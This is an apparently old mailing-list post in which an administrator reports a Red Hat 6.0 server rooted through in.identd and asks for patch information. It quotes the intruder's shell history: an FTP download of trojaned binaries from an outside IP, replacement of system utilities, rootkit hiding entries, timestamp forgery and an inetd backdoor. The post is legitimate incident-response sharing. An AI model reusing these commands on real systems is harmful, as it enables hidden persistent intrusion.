Rooted through in.identd on Red Hat 6.0

[del () BABEL COM AU (Del Elson)]

Hi,

A client was hacked last week by what looked like a buffer
overflow through in.identd.  This was on a Red Hat 6.0
box.

RH don't have any current security notices or fixes for
in.identd on their servers, and I haven't seen other
boxes hacked through in.identd recently.

The hacker left the usual trace in /.bash_history, which
ran like:

mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21
cd /usr/lib/...
mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz?
pstree.gz;
mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz?
syslogd.gz;
mv tcpd.gz? tcpd.gz
gzip -d *
chmod +x *
mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv
syslogd /usr/sbin;
mv pt07 /usr/lib/; mv pstree /usr/bin ;
/usr/lib/pt07
echo "2 sh" >> /dev/cui220 ; echo "2 slice2" >> /dev/cui220
;
echo "2 bnc" >> /dev/220 ; echo "4 6667" >> /dev/cui221 ;
echo "3 15678" >> /dev/cui221 ; echo "2 pt07" >> /dev/cui220
;
echo "3 1679" >> /dev/cui221; echo "3 5454" >> /dev/cui221;
touch -t 199910122110 /dev/cui220
touch -t 199910122110 /dev/cui221
touch -t 199910122110 /usr/lib/pt07
touch -t 199910122110 /usr/sbin/syslogd
touch -t 199910122110 /usr/sbin/tcpd
touch -t 199910122110 /bin/ps
touch -t 199910122110 /bin/netstat
touch -t 199910122110 /usr/bin/pstree
cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
mv /tmp/b /etc/inetd.conf
killall -HUP inetd

... installing a back door and a partial cover of tracks.

The only messages in /var/log/messages around the time
were:

Apr  8 23:15:57 home identd[12006]: Connection from
200.192.58.201
Apr  8 23:15:57 home identd[12006]: from: 200.192.58.201 (
200.192.58.201 ) for: 1176, 21
Apr  8 23:16:05 home identd[12007]: Connection from
200.192.58.201
Apr  8 23:16:05 home identd[12007]: from: 200.192.58.201 (
200.192.58.201 ) for: 1176, 21

... the IP address traces back to somewhere in Brazil.

Anyone know of any current bug notices, exploits, or
patches for in.identd?

Del